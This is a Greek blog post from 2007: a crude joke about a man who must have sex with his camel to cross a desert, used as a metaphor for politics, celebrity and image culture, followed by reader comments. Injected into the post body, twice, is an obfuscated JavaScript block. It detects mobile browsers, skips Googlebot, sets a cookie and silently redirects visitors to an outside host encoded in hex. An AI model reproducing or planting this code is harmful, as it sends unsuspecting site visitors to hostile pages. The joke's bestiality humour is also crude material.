anwnymous

Ιουνίου 24, 2007

Ένα ανέκδοτο, πολύ ρίσκο , λίγο … μόντελινγκ και λίγη … πολιτική .

Filed under: Uncategorized — thelastrealanwnymous @ 10 :52 πμ

Με κουρασμένα βήματα , μετά από 20 χρόνια τζόγου , στοιχημάτων και μιας  επικίνδυνης ζωής , ένας τυχοδιώκτης φθάνει μια μέρα στο παζάρι με τις καμήλες. Στη τσέπη του έχει ελάχιστα χρήματα. Είναι ολοκληρωτικά κατεστραμμένος . Κάποιος άλλος στη θέση του θα ήταν ξαπλωμένος στο πεζοδρόμιο και θα ζητούσε ελεημοσύνη . Έχει μόνο στα μάτια του τη λάμψη αυτών των ανθρώπων που λίγοι την ξέρουν και που μόνο αυτή φαίνεται να τον κρατάει ακόμα ζωντανό.

 Σ’ αυτό το παζάρι καμήλας υπάρχει πολύς κόσμος και όλοι προσπαθούν να αγοράσουν καμήλα πληρώνοντας πάρα πολλά, γιατί κυκλοφορεί η φήμη , ότι βρέθηκε  χρυσάφι στην άλλη άκρη της ερήμου και χωρίς καμήλα είναι αδύνατον να φθάσεις εκεί. Δίνονται μάχες για μία καλή καμήλα , οι τιμές βρίσκονται στα ύψη και κανείς δεν απομακρύνεται και κανένα δεν τρομάζει ούτε ο συνωστισμός, ούτε οι τιμές ,διότι «πολλοί την δόξαν εμίσησαν , το χρήμα όμως …». Η ώρα περνάει ,οι καλές καμήλες λιγοστεύουν , μένουν μόνο κάτι άρρωστες και γέρικες που δεν μπορούν ούτε καν να βγουν από την πόλη , πόσο μάλλον να περπατήσουν και στην έρημο. Ο κόσμος στο παζάρι αραιώνει ,όμως ο άνθρωπος με τη λάμψη στα μάτια δεν απομακρύνεται . Εξακολουθεί να υπολογίζει τη δύναμη των λίγων ζώων που απέμειναν και να ρωτάει τιμές αλλά και πάλι τα χρήματα του δεν τον φθάνουν να αγοράσει έστω και μία απ αυτές τις άχρηστες καμήλες.

Κάποια στιγμή φθάνει σ’ έναν έμπορο που ξέρει να «κόβει» τους πελάτες και πριν αρχίσει τα παζάρια ο έμπορος πρώτος τον ρωτάει: «Πόσα έχεις;» . Όταν ακούει το ποσόν του λέει εμπιστευτικά: «Σ’ αυτή τη τιμή έχω μία καμήλα. Είναι γέρικη αλλά θα καταφέρει να περάσει την έρημο. Το μόνο λεπτό σημείο που θα προσέξεις είναι ότι αν σταματήσει στη μέση της διαδρομής ,πρέπει να κάνεις σεξ μαζί της. Μόλις ικανοποιηθεί θα σηκωθεί μόνη της και θα συνεχίσει να προχωράει. Φυσικά όπως καταλαβαίνεις και η καμήλα είναι κι αυτή ένα θηλυκό. Θα σου συστήσω λοιπόν να της φερθείς με τρυφερότητα και αγάπη και πρόσεξε πολύ μη τη πληγώσεις.» Αυτά είπε ο σοφός έμπορος στο πελάτη και έφυγε από το παζάρι ικανοποιημένος ,αφού κατάφερε να πουλήσει ακόμα κι αυτή τη γέρικη καμήλα.

Ο φίλος μας ο τυχοδιώκτης λίγο αμήχανος και λίγο υποψιασμένος – είχε κάνει πολύ χειρότερα πράγματα στη ζωή του από το να συνευρεθεί σεξουαλικά με μία καμήλα – έριξε μία τελευταία ματιά στα πίσω πόδια του ζώου ,προσπαθώντας ίσως να φανταστεί πως θα ήταν αυτή η επαφή με….ας μη σκεφτούμε καλύτερα τι μπορεί να φαντάστηκε, και μετά με ένα σάλτο βρέθηκε στη πλάτη της και τράβηξε προς την έρημο.

Έκαναν αρκετά χιλιόμετρα μες τον ήλιο και ο τυχοδιώκτης είχε ξεχαστεί ρεμβάζοντας από το λίκνισμα του βηματισμού του ζώου ,όταν ξαφνικά η καμήλα σταμάτησε στη μέση της ερήμου και ξάπλωσε κάτω. Την τράβηξε από το χαλινάρι αλλά τίποτε. Τότε θυμήθηκε τον έμπορο και έκανε ότι ακριβώς του είχε πει εκείνος. Η καμήλα πράγματι μόλις ικανοποιήθηκε σηκώθηκε και συνέχισε να προχωράει κουβαλώντας στη πλάτη τον αναβάτη της.

Και πάλι έκαναν αρκετή διαδρομή πριν το ζώο σταματήσει περιμένοντας την «αναζωογονητική» επέμβαση του ανθρώπου. Και πάλι ο φίλος μας χωρίς να την πληγώσει και χωρίς να φερθεί βίαια κατάφερε να σηκώσει τη καμήλα στα πόδια της. Και πέρασαν πάρα πολλά χιλιόμετρα μαζί ,τόσα που ο αναβάτης θυμήθηκε όλη αυτή την εικοσαετή πορεία του στο κυνήγι του χρήματος  και η καμήλα σταμάτησε αρκετές φορές και ο αναβάτης κατάφερε με τη συνηθισμένη μέθοδο πλέον να τη σηκώνει και φαίνεται πως πλησίαζαν προς το τέλος της διαδρομής και η αγωνία του τζογαδόρου που μυρίζεται χρυσάφι μεγάλωνε και η ανυπομονησία γινόταν πιο έντονη , όταν η καμήλα σταμάτησε για μια ακόμα φορά.

Κατέβηκε από τη πλάτη της και προσπάθησε να επαναλάβει την δια του σπέρματος αναζωογόνησή της . Όμως το ζώο φαινόταν πολύ νευρικό αυτή τη φορά , κουνιόταν απότομα και δεν του επέτρεπε να «βρει το στόχο του». Εκείνος προσπάθησε ξανά και ξανά αλλά η καμήλα τίποτε. Δεν του καθόταν. Ο άνθρωπος με τη λάμψη στα μάτια ξέρει πως το χρυσάφι είναι πολύ κοντά και προσπαθεί και επιμένει και δεν δέχεται με τίποτε πως η καμήλα θα μπει εμπόδιο στο σκοπό του. Όμως το ζώο ανένδοτο. Δεν στέκεται ούτε στιγμή , σαν να προσπαθεί να του σπάσει το ηθικό. Αν είχε περίστροφο πάνω του θα την πυροβολούσε και θα συνέχιζε με τα πόδια. Τόσο είχε θυμώσει με την «αψυχολόγητη» στάση της . Τότε μέσα στη μεγάλη απελπισία του ο άνθρωπος ρίχνει μία ματιά γύρω του και βλέπει να τον πλησιάζει μια όμορφη γυμνή γυναίκα. ( Θα μπορούσαμε να φανταστούμε κάποια σαν την Ναόμι ή την Ιμάν , μου είναι κάπως δύσκολο να φανταστώ μία γυμνή ξανθιά να κυκλοφορεί μόνη της στην έρημο.) Τρέχει προς το μέρος της , πέφτει στα πόδια της γονατιστός και λέει ικετεύοντας: « Σε παρακαλώ  μου κρατάς λίγο τη καμήλα να τη πηδήξω;»

J  J  J  J  J 

Εδώ τελειώνει το ανέκδοτο. Ο άνθρωπος απαιτεί από μια ωραία γυναίκα να του κρατήσει τη καμήλα. Ο πολιτικός που θα εντάξει στους υποψηφίους του μία συμπαθέστατη σελέμπριτι , ένα τηλεοπτικό αστέρι  ,θα της ζητήσει να «ακινητοποιήσει την καμήλα». Και όλα αυτά για να φθάσει ανυπερθέτως στο χρυσάφι . Οι μεγάλες εταιρείες που χρησιμοποιούν καλλιτέχνες , τέλεια μοντέλα , άτομα με φαντασία και ευαισθησίες, θέλουν απαραιτήτως κάποιον να κρατήσει τη καμήλα. Ενώ το ζητούμενο είναι μία καλύτερη ζωή , μία πιο όμορφη γυναίκα , μπαίνουμε κάποια στιγμή τόσο βαθιά στο σκότος των παρωπίδων μας , που θα ζητήσουμε από το τέλειο πλάσμα των ονείρων μας – από τον εκφραστή της ιδανικής ζωής που φανταζόμαστε ότι κάπου θα υπάρχει -να κρατήσει τη καμήλα. Φαίνεται πως ο συγγραφέας ,ο δημοσιογράφος , οι άνθρωποι που επικαλούνται τη δικαιοσύνη ,που παλεύουν για ένα ιδανικό , ουσιαστικά κρατάνε κάποιου τη καμήλα. «Οι διανοούμενοι είναι οι τσιρλίντερ της εξουσίας» έλεγε ο Τσόμσκι.

Δεν θα αναφερθώ σε πρόσωπα γιατί πιστεύω ότι ήδη έχετε κάνει το κάστινγκ σας και έχετε μοιράσει ρόλους σε άνδρες και γυναίκες της πολιτικής , των καλλιτεχνών , του ποδοσφαίρου και ίσως λέω , ίσως … να υπάρχουν άτομα και από το άμεσο περιβάλλον σας , που υποχρεούνται να κρατάνε σε καθημερινή βάση τη καμήλα κάποιου. (για να βοηθήσουν να φθάσει στο  χρυσάφι)

Το μόνο ίσως που διαπιστώνω με λύπη είναι ότι κι αυτό το άτομο που εκφράζει την ομορφιά , ή ο άνθρωπος που με τη ζωή του και τα έργα του φαίνεται να εκφράζει μια ιδανική στάση ζωής, ακόμα κι αυτός, τελικά στην εποχή μας αποδεικνύεται «κατασκευασμένος» . Δηλαδή μιλάμε για μια επίπλαστη ομορφιά ,για μια χρηστική αισθητική που μπορεί να απευθύνεται άνετα στις ανάγκες τηλεοπτικών λίφτινγκ , απατηλών τηλεμάρκετινγκ και ηλεκτρονικών κουφωμάτων ( βλέπε τηλεοπτικά παράθυρα ) διαμορφώνοντας καθημερινά το προφίλ του εν δυνάμει επαγγελματία «καμηλοακινητοποιητή».

…και φυσικά μιλάμε πάντα για έμμισθες υπηρεσίες και όχι για παράνομες πράξεις.

Ίσως σε μία τέτοια μεταβατική εποχή , που βλέπουμε  το τέλος της ιστορίας , το τέλος των εθνικών συνόρων , μπορεί να μιλάμε και για το τέλος των προσώπων , σε μια φάση παντοδυναμίας της εικόνας και υποταγής των προσώπων σε μία λεπτή επιφάνεια, εν είδη θεατρικής μάσκας που καταφέρνει με το «ψεύτικο» πλαστικό υλικό της να ψευτίζει το «είναι» και να ενισχύει το «φαίνεσθαι».akaras1979@yahoo.grvar _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Advertisements

22 Σχόλια »

  1. το είναι δεν αλλάζει. το φαίνεσθαι μπορεί να ωραιοποιηθεί. μόλις το αγγίξεις βέβαια καταλαβαίνεις πόσο ψεύτικο είναι. το θέμα είναι να τολμήσεις να το αγγίξεις…
    «ελευθερώστε την καμήλα» είναι λοιπόν το νέο μας σύνθημα;
    οκ. επικροτώ.

    Σχόλιο από Natalia — Ιουνίου 24, 2007 @ 6 :09 μμ | Απάντηση

  2. natalia
    ελευθερώστε την καμήλα;
    ναιεεε , και μαλιστα να εχουν και δικαίωμα ψήφου.
    🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 25, 2007 @ 12 :34 μμ | Απάντηση

  3. Φυσιολογικά τα βρίσκω όλα. Καθένας κάνει τις θυσίες του, καταπίνει τα αναμασημένα – δικά του ή μη- για την δική του ευρωστία κι όχι μόνο για των άλλων. Ίσως και απλά για την επιβίωση του. Φυσικά όλα. Το θέμα είναι τι αντέχεις να μην έχεις.

    Σχόλιο από V — Ιουνίου 25, 2007 @ 2 :57 μμ | Απάντηση

  4. Ποτέ το φαίνεσθαι δεν θέλησε να είναι τόσο «είναι» στη θέση του είναι. Τόση επένδυση και χρόνος όμως για το τίποτε; Και ο χρυσός στην άκρη της ερήμου μπας και είναι κάλπικος; Και η καμήλα γέρικη από τα θέλω των άλλων που την καβαλούν;

    Σχόλιο από doratsirka — Ιουνίου 25, 2007 @ 3 :21 μμ | Απάντηση

  5. V
    δεν πιστεύω να κρατας κανενα «χαλινάρι» .
    σε εχω στο τμήμα με τα ψηλά στάνταρς στο μυαλό μου.
    🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 26, 2007 @ 11 :38 πμ | Απάντηση

  6. δωρα τσιρκα
    (εχεις το επίθετο του αγαπημένου μου συγγραφέα, του στρατή τσίρκα)
    όσο μεγαλώνει ο τυχοδιώκτης τόσο μεγαλύτερα ρίσκα παίρνει.
    εχουμε εδώ αυτούς τους δύο εκρηκτικούς παράγοντες : ένας τυχοδιώκτης και η προσδοκία του χρυσού.
    οπότε είναι ετοιμος να κάνει οτιδήποτε για να πετύχει το στόχο και φεύγοντας απο το ανεκδοτο και … πηγαίνοντας στο σήμερα εχουμε αυτή τη μεταφορά του παιχιδιού στην εικόνα πλέον , όπου εκεί η τι βι , οι πολυεθνκές , οι διαφημιστικές «κανουν παιχνίδι» μιλώντας για την εικόνα , γιατί την ουσία των πραγμάτων την γνωρίζουν όλοι και δεν εχει ενδιαφέρον να μιλάς γι αυτήν .

    Σχόλιο από thelastrealanwnymous — Ιουνίου 26, 2007 @ 11 :47 πμ | Απάντηση

  7. Σας ευχαριστώ για την υψηλή εκτίμηση:-) Δεν θα βρισκόμουν ποτέ στην έρημο- λέω- κι όσο για το χαλινάρι, τζίζους όπως θα έλεγε και ο Sardo… Θα γελούσα απίστευτα με τον ταλαιπωρημένο κύριο και θα απομακρυνόμουν ξεκαρδισμένη:-)

    Σχόλιο από V — Ιουνίου 26, 2007 @ 12 :12 μμ | Απάντηση

  8. Εγώ πάλι τί να πω εδώ.. μου έρχονται διάφορες εικόνες στο μυαλό με ‘φτιαγμένες’ υψηλές αισθητικές ανάλογα με την αντίληψη που έχει κάποιος περί αισθητικής πάντα ( ας μην ξεχνάμε και τί βλέπουμε συνολικά ).
    Από επιλογή βρίσκομαι πάντα στη μοναχική όχθη του ποταμού μαζί με αρκετούς άλλους, όπως διαπιστώνω.
    Κρατώ τη φράση του Νόαμ Τσόμσκι, αμφισβητώντας την λίγο,έτσι τουλάχιστον όπως γράφτηκε εδώ: Ναι οι διανοούμενοι είναι οι τσίρλίντερς της εξουσίας αλλά πρέπει αυτό/αυτά που λένε να διυλίζονται και από εμάς. Με όσα κριτήρια διαθέτει κάποιος. Ίσως τότε αλλάξει και η σχέση που υπονοεί ο Τσόμσκι.. για τους διανοούμενους..

    Σχόλιο από So_Far — Ιουνίου 27, 2007 @ 12 :02 μμ | Απάντηση

  9. σο φαρ
    λοιπόν ακόμα μια δύσκολη ερώτηση για σενα.
    αν καποιος σου πρότεινε υποψηφιότητα στις επερχόμενες εκλογές τι απαντάς ;
    πες μου , τιιιι;
    🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 27, 2007 @ 9 :12 μμ | Απάντηση

  10. Το θέμα είναι τι θέλεις και τι δεν θέλεις εδώ.. και το τι αντέχεις, και τι δεν αντέχεις μέσα στη ζωή σου!!! 🙂

    Σχόλιο από Danai — Ιουνίου 28, 2007 @ 2 :37 μμ | Απάντηση

  11. Είναι η πιο εύκολη ερώτηση που μου έχεις θέσει so far.. Κατηγορηματικά ΟΧΙ. Δεν το αντέχω με τίποτα..

    Σχόλιο από So_Far — Ιουνίου 28, 2007 @ 3 :19 μμ | Απάντηση

  12. danai
    είναι η «λάμψη» στο μάτι που εχει ο κάθε τυχοδιώκτης .
    ένα ενισχυμένο ενστικτο επιβίωσης που δεν σταματάει ποτέ να τροφοδοτεί την ψυχή με μια ακορεστη επιθυμία για ζωή .
    το εχω δει και σε ηλικιωμένους με το ένα ποδι στο υπερπεραν …
    και όταν σου συμβαίνει τότε όλα τα θέλεις και όλα τα αντεχεις για να τα κατακτησεις …

    Σχόλιο από thelastrealanwnymous — Ιουνίου 29, 2007 @ 10 :26 πμ | Απάντηση

  13. σο φαρ
    οχι ειπες;
    μάλλον προκειται για ένα οχι που το εχεις πει απο καιρό … απο την εποχή των ρηγαδων φανταζομαι .
    ( η πιό σεξι πολτική ομάδα της δεκαετίας του 80, να δεις το υφος των φίλων του πατέρα μου όταν τον ρωταώ για τότε … και καλά πως ζούσατε χωρίς κινητά; τους ανεβαίνει το αίμα στο κεφάλι μιλάμε.)
    🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 29, 2007 @ 10 :31 πμ | Απάντηση

  14. γενικό
    «ποτε δεν πρέπει να κάνεις τον έξυπνο».
    και κυρίως …ποτέ δηλώσεις πριν τον αγώνα .
    γιατί όταν την πατάς τότε η χυλόπιτα είναι ακόμα πιο σιχαμερή.
    λοιπόν …
    χθες δεχτηκα μία ανανδρη επίθεση απο το «σδοε».
    ήμουν μόνος μου στο γραφείο και τα εκανα θαλασσα.
    4 παλικαρια με ευγένεια και καλούς τρόπους ανακάλυψαν διαφορες παραβασεις που δεν θα τις εβρισκαν αν μιλούσα λιγώτερο .
    μήπως εχω γίνει ομιλητικός εξαιτίας των μπλογκς ;
    τέλος πάντων , ο μεγάλος απείλησε να μου κόψει τις διακοπες .
    δεν ξερω πως να το χειριστώ.
    δεν ξερω που να ξεσπάσω , να εκτονωθώ.
    επίσης αυτό το καιρό εχω ανακαλύψει κατι σημειωσεις του απο τα παλιά.
    έγραφε κι αυτός αλλά δεν το αποκαλύπτει.
    να αρχίσω να ανεβαζω «τα δικά του» εδώ ;
    τι λέτε ;
    🙂 🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 29, 2007 @ 10 :40 πμ | Απάντηση

  15. Εγώ καμήλα δεν πηδάω.
    (Διακοπές έλα να κάνουμε μαζί. Έχω συλλάβει κάτι ΤΟΠΙΑ τώρα που έγινα σερίφης:-)
    ααα..μπήκες στη δεύτερη ταινία της click-@ films

    Σχόλιο από Sardonian — Ιουνίου 29, 2007 @ 12 :12 μμ | Απάντηση

  16. sarnto
    είσαι τύπος που εχει το χρυσάφι μέσα του , οπότε δεν σκοπευεις να περάσεις την ερημο γι αυτό.
    🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 29, 2007 @ 1 :11 μμ | Απάντηση

  17. Σωστά! από εκείνη την εποχή. Μετά από 4 χρόνια βαρέθηκα τα πάντα και τους πάντες και παραιτήθηκα από όλα τα όργανα. Ανακούφιση.
    Όσο για τους φίλους του μπαμπά σου, δεν περιγράφεις το ύφος αλλά μπορώ να το καταλάβω. Δεν είναι τυχαίο το ‘Ρήγας Φεραίος, ο κάθε σέξυ νέος’ που λεγόταν τότε.
    Όσο για τα κινητά; Αν δεν ξέρεις κάτι δεν σου λείπει, απλό είναι. Άσε που βόλευε να εξαφανιστείς όποτε ήθελες..

    Σχόλιο από So_Far — Ιουνίου 29, 2007 @ 2 :43 μμ | Απάντηση

  18. ΣΔΟΕ; Αμάν.Μην τιμωρείς τον εαυτό σου για το αν μίλησες περισσότερο από όσο έπρεπε. Αυτά τα πράγματα μαθαίνονται σιγά σιγά. Οπότε λίγη κατανόηση από τον ‘μεγάλο’ δεν βλάπτει. Τώρα, για τις διακοπές; Ε, μάλλον θα το είπε πάνω στα νεύρα του, δε νομίζω να σε αφήσει να κάνεις το καβούρι στις λεωφόρους της Αθήνας ( αν και εδώ που τα λέμε Αύγουστο η Αθήνα είναι απλά unpaictable )
    Όσο για τα γραπτά του μεγάλου, έχουμε χτυπήσει ‘οικογενειακή φλέβα’ μου φαίνεται.. Θα ήταν σωστό να τα δημοσιεύσεις χωρίς να το ξέρει; Δεν ξέρω. Σκέψου το

    Σχόλιο από So_Far — Ιουνίου 29, 2007 @ 2 :48 μμ | Απάντηση

  19. Αν και δεν συνηθίζεται, σας προκαλώ κι εγώ πετώντας σας το γάντι. Ίσως γιατί στην Σαιξπηρική «μετενσάρκωση» του Διαδικτυακού Έρωτα οι γυναίκες είναι πολύ πολύ πιο γενναία διαφορετικές.
    Είναι άραγε, αλήθεια έτσι; Τολμούν;Κι οι άντρες; Δειλοί ενοχικοί;
    Σας περιμένω

    Σχόλιο από V — Ιουνίου 29, 2007 @ 3 :00 μμ | Απάντηση

  20. so far
    με εχει πρηξει με το σδοε.
    και εχω και ενα σωρο δουλειες.
    εχώ υποσχεθεί σε σένα αυτό το βροχερό φθινοπωρινό ποστ και στην «V» ένα ποστ που να μιλάει για τους διαδικτυακούς ερωτες.
    🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 30, 2007 @ 7 :26 μμ | Απάντηση

  21. «ν»
    αν και οι βαθύτερες σκεψεις αποκαλύπτουν ένα αλλο πρόσωπο από αυτό που «χτιζω» εδώ μεσα θα απαντήσω σύντομα.
    🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 30, 2007 @ 7 :28 μμ | Απάντηση

  22. so far
    σε πειράζει να απαντήσω τώρα στο δ.ε. με ένα ποστάκι για διαδικτυακούς ερωτες και να ανεβάσω το άλλο γουικ έντ το «βροχερό σου» ποστ?
    🙂

    Σχόλιο από thelastrealanwnymous — Ιουνίου 30, 2007 @ 7 :58 μμ | Απάντηση


RSS feed for comments on this post. TrackBack URI

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

